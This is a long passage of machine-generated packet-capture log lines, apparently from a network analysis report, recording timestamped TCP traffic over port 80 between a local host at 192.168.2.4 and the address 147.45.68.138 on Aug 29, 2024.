                                                      Aug 29, 2024 22:52:21.909991980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910026073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910037041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910047054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910058975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910077095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910089970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910410881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910434961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910444975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910463095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910490036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910516977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910526991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910537958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910547972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910559893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910567999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910576105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910604000 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910689116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910698891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910708904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910720110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910732985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910743952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.910744905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910754919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.910774946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.921664953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921715975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.921725988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921736956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921768904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.921936035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921947002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921957016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921972990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921988010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.921997070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.921999931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922024012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922024965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922035933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922045946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922046900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922056913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922060966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922080994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922082901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922096014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922105074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922106028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922116041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922126055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922128916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922137976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922148943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922152996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922159910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922171116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.922175884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922188997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.922218084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924144030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924194098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924221992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924232960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924268961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924305916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924316883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924340010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924350023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924356937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924371004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924376965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924382925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924393892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924397945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924410105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924418926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924431086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924443007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924447060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924458027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924458981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924469948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.924484015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.924508095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956403017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956453085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956584930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956614017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956625938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956635952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956644058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956646919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956659079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956664085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956669092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956690073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956698895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956708908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956713915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956717968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956732035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956739902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956743002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956760883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956763029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956773043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.956782103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.956808090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.988755941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.988768101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.988797903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.988809109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.988811016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.988818884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.988831043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.988842010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.988841057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.988856077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.988879919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994014025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994030952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994040966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994071007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994086027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994090080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994102001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994112015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994121075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994123936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994134903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994163990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994400024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994410992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994420052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994446039 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994460106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994482994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994493961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994503021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994518042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994519949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994539976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994546890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994556904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994566917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994566917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994579077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994590998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994601011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994601965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994611979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994622946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.994623899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994647026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.994668007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995367050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995415926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995454073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995482922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995488882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995495081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995505095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995516062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995522022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995532990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995539904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995549917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995553970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995560884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995575905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995593071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995600939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995604038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995618105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995626926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995634079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995640993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995647907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995651007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.995681047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.995698929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.996793985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.996803999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.996814966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.996848106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.996879101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.996915102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.996926069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.996936083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.996947050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.996953964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.996973038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.996998072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997260094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997271061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997279882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997307062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997334003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997364044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997374058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997381926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997391939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997401953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997404099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997416973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997445107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997477055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997488976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997498035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997508049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997513056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997519970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997526884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997530937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.997556925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.997580051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008629084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008641958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008651972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008692980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008707047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008709908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008718014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008723021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008728981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008733988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008760929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008771896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008799076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008850098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008862019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008869886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008888006 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008892059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008903027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008909941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008914948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008924007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008932114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008940935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008944035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008960009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008961916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008970976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008981943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.008982897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.008995056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.009006023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.009006023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.009030104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.009042978 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.009175062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.009216070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.010951042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011002064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011009932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011037111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011049986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011081934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011106968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011121988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011157036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011168957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011184931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011192083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011202097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011217117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011261940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011272907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011281967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011293888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011303902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011307001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011317015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011317015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011328936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011339903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011344910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011353970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.011359930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011379004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.011400938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043286085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043298006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043313026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043334007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043359995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043517113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043528080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043536901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043549061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043559074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043560982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043570042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043584108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043586969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043596029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043606043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043610096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043618917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043622017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043637991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.043648958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.043673992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.075474024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075486898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075496912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075556040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.075567007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075578928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075582027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.075589895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075601101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075611115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.075613022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.075630903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.075660944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.080945969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.081001997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.081031084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.081042051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.081052065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.081075907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.081079960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.081089973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.081090927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.081104040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.081109047 CEST4973980192.168.2.4147.45.68.138
